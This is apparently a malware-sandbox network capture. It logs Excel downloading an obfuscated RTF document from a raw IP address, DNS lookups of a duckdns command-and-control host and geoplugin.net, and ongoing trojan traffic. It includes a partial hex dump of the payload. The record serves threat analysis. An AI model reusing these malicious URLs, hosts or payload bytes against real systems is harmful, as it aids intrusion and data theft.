                                                                      Aug 28, 2024 06:54:16.763200998 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.763206959 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.763216972 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.763228893 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.763250113 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.763346910 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.763359070 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.763369083 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.763377905 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.763387918 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.763396978 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.763398886 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.763411045 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.763417959 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.763421059 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.763432980 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.763442039 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.763443947 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.763458967 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.763463020 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.763472080 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.763493061 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.763500929 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.763511896 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.763545036 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.763885975 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.764883995 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.773557901 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.809607029 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.809633017 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.809643030 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.809662104 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.809672117 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.809681892 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.809684992 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.809698105 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.809705019 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.809734106 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.809762955 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.809775114 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.809784889 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.809796095 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.809806108 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.809808016 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.809825897 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.809870958 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.809881926 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.809891939 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.809901953 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.809916019 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.809920073 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.809962988 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.809971094 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.809974909 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.810007095 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.810046911 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.810062885 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.810075045 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.810086966 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.810098886 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.810105085 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.810117006 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.810152054 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.810163021 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.810173035 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.810183048 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.810192108 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.810197115 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.810220957 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.810244083 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.810256004 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.810278893 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.810303926 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.810314894 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.810324907 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.810338020 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.810338974 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.810400009 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.810410023 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.810420990 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.810432911 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.810441971 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.810484886 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.810497046 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.810507059 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.810527086 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.810549021 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.810565948 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.810576916 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.810590029 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.810605049 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.810621023 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.810661077 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.810672998 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.810684919 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.810722113 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.810766935 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.810777903 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.810790062 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.810811996 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.810853958 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.810866117 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.810877085 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.810889959 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.810898066 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.810920000 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.811044931 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.811055899 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.811068058 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.811079979 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.811091900 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.811104059 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.811110020 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.811115026 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.811120987 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.811134100 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.811146975 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.811150074 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.811166048 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.811186075 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.811199903 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.811213970 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.811223984 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.811237097 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.811244965 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.811258078 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.811306953 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.811319113 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.811330080 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.811341047 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.811352015 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.811362028 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.811868906 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:17.038546085 CEST8049175178.237.33.50192.168.2.22
                                                                      Aug 28, 2024 06:54:17.038656950 CEST4917580192.168.2.22178.237.33.50
                                                                      Aug 28, 2024 06:54:22.472073078 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:22.476950884 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:22.476979971 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:22.477049112 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:22.481879950 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:22.481889009 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:22.481897116 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:22.481952906 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:22.481977940 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:22.481990099 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:22.482057095 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:22.487409115 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:22.487457037 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:22.487476110 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:22.487548113 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:22.487679958 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:22.487688065 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:22.487714052 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:22.487754107 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:22.487799883 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:22.492377996 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:22.492386103 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:22.492419004 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:22.496222019 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:22.501310110 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:22.502746105 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:30.920988083 CEST1464549173192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:30.922982931 CEST4917314645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:30.929721117 CEST1464549173192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:55:01.803839922 CEST1464549173192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:55:01.805473089 CEST4917314645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:55:01.810344934 CEST1464549173192.210.214.9192.168.2.22

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Aug 28, 2024 06:53:49.345912933 CEST5456253192.168.2.228.8.8.8
                                                                      Aug 28, 2024 06:53:49.356564999 CEST53545628.8.8.8192.168.2.22
                                                                      Aug 28, 2024 06:53:51.752123117 CEST5291753192.168.2.228.8.8.8
                                                                      Aug 28, 2024 06:53:51.762725115 CEST53529178.8.8.8192.168.2.22
                                                                      Aug 28, 2024 06:53:53.611028910 CEST6275153192.168.2.228.8.8.8
                                                                      Aug 28, 2024 06:53:53.621066093 CEST53627518.8.8.8192.168.2.22
                                                                      Aug 28, 2024 06:53:53.623045921 CEST5789353192.168.2.228.8.8.8
                                                                      Aug 28, 2024 06:53:53.633049011 CEST53578938.8.8.8192.168.2.22
                                                                      Aug 28, 2024 06:53:57.797185898 CEST5482153192.168.2.228.8.8.8
                                                                      Aug 28, 2024 06:53:57.807403088 CEST53548218.8.8.8192.168.2.22
                                                                      Aug 28, 2024 06:53:57.808645964 CEST5471953192.168.2.228.8.8.8
                                                                      Aug 28, 2024 06:53:57.815525055 CEST53547198.8.8.8192.168.2.22
                                                                      Aug 28, 2024 06:53:59.382438898 CEST4988153192.168.2.228.8.8.8
                                                                      Aug 28, 2024 06:53:59.389516115 CEST53498818.8.8.8192.168.2.22
                                                                      Aug 28, 2024 06:53:59.391988993 CEST5499853192.168.2.228.8.8.8
                                                                      Aug 28, 2024 06:53:59.399003029 CEST53549988.8.8.8192.168.2.22
                                                                      Aug 28, 2024 06:54:09.844517946 CEST5278153192.168.2.228.8.8.8
                                                                      Aug 28, 2024 06:54:09.853941917 CEST53527818.8.8.8192.168.2.22
                                                                      Aug 28, 2024 06:54:13.739921093 CEST6392653192.168.2.228.8.8.8
                                                                      Aug 28, 2024 06:54:13.837308884 CEST53639268.8.8.8192.168.2.22
                                                                      Aug 28, 2024 06:54:15.412986994 CEST6551053192.168.2.228.8.8.8
                                                                      Aug 28, 2024 06:54:15.422159910 CEST53655108.8.8.8192.168.2.22

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Aug 28, 2024 06:53:49.345912933 CEST192.168.2.228.8.8.80x28f7Standard query (0)zhort.deA (IP address)IN (0x0001)false
                                                                      Aug 28, 2024 06:53:51.752123117 CEST192.168.2.228.8.8.80xa5e0Standard query (0)zhort.deA (IP address)IN (0x0001)false
                                                                      Aug 28, 2024 06:53:53.611028910 CEST192.168.2.228.8.8.80xd0f3Standard query (0)zhort.deA (IP address)IN (0x0001)false
                                                                      Aug 28, 2024 06:53:53.623045921 CEST192.168.2.228.8.8.80x797aStandard query (0)zhort.deA (IP address)IN (0x0001)false
                                                                      Aug 28, 2024 06:53:57.797185898 CEST192.168.2.228.8.8.80xc083Standard query (0)zhort.deA (IP address)IN (0x0001)false
                                                                      Aug 28, 2024 06:53:57.808645964 CEST192.168.2.228.8.8.80x1100Standard query (0)zhort.deA (IP address)IN (0x0001)false
                                                                      Aug 28, 2024 06:53:59.382438898 CEST192.168.2.228.8.8.80xb6ecStandard query (0)zhort.deA (IP address)IN (0x0001)false
                                                                      Aug 28, 2024 06:53:59.391988993 CEST192.168.2.228.8.8.80xd97eStandard query (0)zhort.deA (IP address)IN (0x0001)false
                                                                      Aug 28, 2024 06:54:09.844517946 CEST192.168.2.228.8.8.80x2ed6Standard query (0)ia803104.us.archive.orgA (IP address)IN (0x0001)false
                                                                      Aug 28, 2024 06:54:13.739921093 CEST192.168.2.228.8.8.80x3dcStandard query (0)2024remcmon.duckdns.orgA (IP address)IN (0x0001)false
                                                                      Aug 28, 2024 06:54:15.412986994 CEST192.168.2.228.8.8.80x1995Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Aug 28, 2024 06:53:49.356564999 CEST8.8.8.8192.168.2.220x28f7No error (0)zhort.de88.99.66.38A (IP address)IN (0x0001)false
                                                                      Aug 28, 2024 06:53:51.762725115 CEST8.8.8.8192.168.2.220xa5e0No error (0)zhort.de88.99.66.38A (IP address)IN (0x0001)false
                                                                      Aug 28, 2024 06:53:53.621066093 CEST8.8.8.8192.168.2.220xd0f3No error (0)zhort.de88.99.66.38A (IP address)IN (0x0001)false
                                                                      Aug 28, 2024 06:53:53.633049011 CEST8.8.8.8192.168.2.220x797aNo error (0)zhort.de88.99.66.38A (IP address)IN (0x0001)false
                                                                      Aug 28, 2024 06:53:57.807403088 CEST8.8.8.8192.168.2.220xc083No error (0)zhort.de88.99.66.38A (IP address)IN (0x0001)false
                                                                      Aug 28, 2024 06:53:57.815525055 CEST8.8.8.8192.168.2.220x1100No error (0)zhort.de88.99.66.38A (IP address)IN (0x0001)false
                                                                      Aug 28, 2024 06:53:59.389516115 CEST8.8.8.8192.168.2.220xb6ecNo error (0)zhort.de88.99.66.38A (IP address)IN (0x0001)false
                                                                      Aug 28, 2024 06:53:59.399003029 CEST8.8.8.8192.168.2.220xd97eNo error (0)zhort.de88.99.66.38A (IP address)IN (0x0001)false
                                                                      Aug 28, 2024 06:54:09.853941917 CEST8.8.8.8192.168.2.220x2ed6No error (0)ia803104.us.archive.org207.241.232.154A (IP address)IN (0x0001)false
                                                                      Aug 28, 2024 06:54:13.837308884 CEST8.8.8.8192.168.2.220x3dcNo error (0)2024remcmon.duckdns.org192.210.214.9A (IP address)IN (0x0001)false
                                                                      Aug 28, 2024 06:54:15.422159910 CEST8.8.8.8192.168.2.220x1995No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                      HTTP Request Dependency Graph

                                                                      • zhort.de
                                                                      • ia803104.us.archive.org
                                                                      • 107.172.31.21
                                                                      • geoplugin.net

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.2249162107.172.31.21803368C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 28, 2024 06:53:50.363102913 CEST477OUTGET /xampp/nbc/un/sweettastedbananabuttersmoothchcolcatebutterrichcontenttokeepsmoothbutterchocolatebuntogetmesweetgirl________yummybutterchocolatesmoothheret.doc HTTP/1.1
                                                                      Accept: */*
                                                                      UA-CPU: AMD64
                                                                      Accept-Encoding: gzip, deflate
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                      Host: 107.172.31.21
                                                                      Connection: Keep-Alive
                                                                      Aug 28, 2024 06:53:50.956017017 CEST1236INHTTP/1.1 200 OK
                                                                      Date: Wed, 28 Aug 2024 04:53:50 GMT
                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                      Last-Modified: Tue, 27 Aug 2024 14:45:54 GMT
                                                                      ETag: "14696-620ab4c79b162"
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 83606
                                                                      Keep-Alive: timeout=5, max=100
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/msword
                                                                      Data Raw: 7b 5c 72 74 66 31 0d 0d 0d 0d 09 09 09 09 09 09 09 09 09 09 7b 5c 2a 5c 73 68 70 64 61 74 61 37 31 30 32 30 37 31 38 20 5c 25 7d 0d 7b 5c 39 39 35 38 37 37 32 36 31 34 5f a7 7c 3b 38 3d 3b 60 34 5b 29 39 38 24 7e 5d 2a 2d 7c 2f 28 7c 29 3b 30 25 5d 28 27 3f 30 7c 21 2c b5 60 3f b5 5b 37 31 26 26 3f 23 38 30 7e 21 7e 5b 2b 5f 28 7e 37 39 28 3a 2c 3f 3b 3e 5e 2c 3d 5d 30 25 3d 33 38 3f 21 2d 2e 2b 5f 2d 35 27 3f 25 a7 b0 5d 7c 37 3f 26 33 28 26 3f 3f 2d 2a 7e 7e 38 b0 35 23 3f 3f 32 b5 5b 7c 35 33 3d 34 35 5f 3f 5b 3d 25 3c 3d 29 39 5f 24 7c 7e 3e 24 30 3b 3f 3f b0 5e b0 5f 3c 34 25 39 3f 2b 2a 24 5f 29 3f 37 3a 5d 35 7c 40 3f 21 23 37 b5 37 23 34 a7 2b 32 3f 5d 29 27 2c 2d 3f 21 30 3b 2d 36 40 3c 3c 5b 3f 23 37 5e 2b 25 a7 2d 25 27 2c 5b 2f 38 29 7e 60 b5 36 3e 40 3c 3a 3c b5 5f 2a 3a 3f 3c b5 28 39 3f 2a a7 3d 3f 3a 26 27 2d 2c 3b 3c 32 3f 3f 37 2e 2f 33 3f 2b 3f 40 28 3d 26 b5 37 23 60 26 60 2c 7c 30 7c 3a 25 7e 2c b0 3f 26 3a 38 3c 21 36 2d 33 3f 37 40 5d a7 5b 33 23 5e 24 a7 34 5d 30 40 a7 2b 36 [TRUNCATED]
                                                                      Data Ascii: {\rtf1{\*\shpdata71020718 \%}{\9958772614_|;8=;`4[)98$~]*-|/(|);0%]('?0|!,`?[71&&?#80~!~[+_(~79(:,?;>^,=]0%=38?!-.+_-5'?%]|7?&3(&??-*~~85#??2[|53=45_?[=%<=)9_$|~>$0;??^_<4%9?+*$_)?7:]5|@?!#77#4+2?])',-?!0;-6@<<[?#7^+%-%',[/8)~`6>@<:<_*:?<(9?*=?:&'-,;<2??7./3?+?@(=&7#`&`,|0|:%~,?&:8<!6-3?7@][3#^$4]0@+6?&45??478^>]#?>(-3_!|$^3*!80&&]`;!*&/(_,*?>?/~2877~+?%$+9&6>?>4/_>;&%=|?*2%%&-+^!05,+^)$6.%?/!3-)4)??^5?++~7:.8|?:6%91$@?9~`.7%>`9@#;<8_&&6;5^?6+)_[2?55@/~2[??:=??[('?*116()6=&5?:^%.$7#/)?&.*$==5<+?9?/?;12`!]82;2^^??&[0&?_;2)`?3.>|?&>#2$)8`56<93?<_?+5)9,#710/;%89?'0<'88~<)`3;:7=:7~!$);:0[6+2=(![??'22978@;)*8&?7?='19#6?+[42010&3$0^3%$'7|)3!#>3/*95[<)0<.]?4-??.9`.~.?&~$2%:|8:5!;!95'--_*2]'?6?9%(>$-:!;-?+*.??%.%:1']#,`?+*?$?3-27^`6=7]%?_5?>2>2`1?&!?]>_]7!+)*-+=?%9.=]=/6_.;..~?*$=?,)[>?)%!??*8?^%95=>+())51?>%?1^76^?!@-3./~&>;7*>5?'?21[
                                                                      Aug 28, 2024 06:53:50.956065893 CEST224INData Raw: 2e 3c 5e 30 5e 60 2a 7e 23 3c 3e 3f 60 35 3c 3d 3c 39 24 21 31 3c 5e 3f 40 26 2f 60 60 5e a7 27 34 39 29 27 21 3b 3c 2f 3c 3c 2f 31 7e 25 2f 25 36 3c 27 3f 2e 3f 29 5b 24 36 34 2c 25 5e 3d 26 29 26 28 2d 24 3d 2c a7 3f 37 36 24 39 25 37 25 2a 33
                                                                      Data Ascii: .<^0^`*~#<>?`5<=<9$!1<^?@&/``^'49)'!;</<</1~%/%6<'?.?)[$64,%^=&)&(-$=,?76$9%7%*3'?#/$?79:?6?[8<=^]%??[*3%???%3?(935('|1+[+/?:>0.8*_-?-'!<?95.!8?7$?|?932]$)>):0&3?>~682&+,&1?4.,7[3@*^'.#3)??(@:9)4?<?.$)?|=%,6^4~4@`32.
                                                                      Aug 28, 2024 06:53:50.956120014 CEST1236INData Raw: 2d 5f 3d 28 3f 29 26 34 28 2d 39 36 25 5d 39 3f 3f 5b 28 2f 25 26 30 26 3a 5f 3a 23 2b 5b 32 27 3d 29 2b 7c 40 30 24 34 38 3f 2b 32 3d 30 31 b5 3f 60 35 33 b5 a7 34 2d 3d 27 2d 30 30 2d 24 2a 3a 2d 29 29 7e 24 a7 3f 25 33 3a 40 25 37 3f 24 2a 31
                                                                      Data Ascii: -_=(?)&4(-96%]9??[(/%&0&:_:#+[2'=)+|@0$48?+2=01?`534-='-00-$*:-))~$?%3:@%7?$*14^-?9=@*&|++%??)_3*1~??3_9?%?6>_*?=@|*.3>9?:;'$#0+`?[??|<3~?~-9-`5,'?=9.!^6-<+#95`?$>|];$,?75[??#59??'??29?+|(6!.?;*#*(&##?]~?(;`4@=?5%?^''1`;?5?,?+8
                                                                      Aug 28, 2024 06:53:50.956156015 CEST1236INData Raw: 5e 23 31 37 21 3f 7e 40 37 3e 30 25 36 3c 3d 7c 29 a7 40 36 23 21 25 3d 33 3f 39 3d 3d b0 35 2f 2d 34 60 7c 3e 3b 2d 30 39 2e a7 37 5d 3a 3e 30 29 36 a7 23 5b 24 2f 2b 7e 39 35 b0 7c 28 b5 2c 2e 3f 3c 37 2e 3b 3f 24 3a 2c 36 2d 28 24 25 25 5b 39
                                                                      Data Ascii: ^#17!?~@7>0%6<=|)@6#!%=3?9==5/-4`|>;-09.7]:>0)6#[$/+~95|(,.?<7.;?$:,6-($%%[9?~;+?#^-~-[+)0*?+?|?9_,[-#|?*^&>??|1;~^$=(]:7.4>~4.098']@77?.|'(:(;'[?_]6*?++1$0?!:=_=68?69%70$19?.8$?6+),8:=&<@3+>4??8/20*|%?81|~=2;?@;:*|88?:/>95~
                                                                      Aug 28, 2024 06:53:50.956190109 CEST1236INData Raw: 5d 3f 34 2b 25 5e 3f 3a 7e 40 28 3a 25 39 3f 27 40 b5 29 2b 24 3f 2d 39 60 3f 39 21 3f b0 3a 5f b5 7c 3f 3f 3f 3c 29 27 60 60 2f 30 24 3f 29 2f 25 2b 24 5d a7 5b 3f 37 3c 28 5f 25 38 3e 2c 3f 5d 3f 25 b0 3d 2c 2a 2a 2d 3e 34 36 32 29 3f 60 36 24
                                                                      Data Ascii: ]?4+%^?:~@(:%9?'@)+$?-9`?9!?:_|???<)'``/0$?)/%+$][?7<(_%8>,?]?%=,**->462)?`6$6>?@^28813?5@%#=,->=~%@(_5]]5???17_~??|!~792-5'/3~*$`:=7@)!.>=4/656>?8~6$>+1?&%>6&2+]?*%&7?~1|:5#)<?/`?!=@*=21/%?9~%@?;)?_@12+<7*]%8!5*>8_8^,)!6>3~,
